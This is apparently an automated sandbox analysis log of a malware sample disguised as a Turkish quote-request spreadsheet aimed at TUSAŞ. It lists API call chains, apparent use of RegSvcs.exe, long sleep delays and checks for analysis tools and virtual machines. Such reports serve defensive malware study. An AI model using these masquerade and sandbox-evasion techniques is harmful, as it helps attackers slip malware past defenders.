                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress,0_2_00FA4B37
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_00FC8945 push ecx; ret 0_2_00FC8958
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | File created: \tekl#u0130f #u0130ste#u011e#u0130 - tusa#u015e t#u00dcrk havacilik uzay sanay#u0130#u0130_xlsx.exe
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_01025376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01025376
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Code function: 0_2_00FC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC3187
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI/Special instruction interceptor: Address: 12617CC
                  Source: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1472935783.0000000001242000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473680519.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473188115.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000003.1473053430.000000000129B000.00000004.00000020.00020000.00000000.sdmp, TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1492217479.000000000129B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598793Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598469Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597156Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596389Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595730Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595074Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594639Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594422Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594312Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1972Jump to behavior
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-105884
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0100445A
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0100C75C
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100C6D1 FindFirstFileW,FindClose,0_2_0100C6D1
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100EF95
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0100F0F2
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100F3F3
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_010037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_010037EF
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_01003B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_01003B12
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_0100BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0100BCBC
                  Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeCode function: 0_2_00FA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00FA49A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599890
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599781
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599672
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599562
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599453
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599344
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599234
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599123
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599014
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598906
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598793
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598687
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598578
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598469
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598359
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598031
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597922
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597812
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597703
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597594
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597375
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597265
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597046
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596937
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596827
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596718
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596500
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596389
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596281
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596171
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596062
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595953
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595843
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595624
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595514
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594859
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594749
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594639
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594531
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594422
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594312
                  Source: RegSvcs.exe, 00000002.00000002.3941945198.0000000003796000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
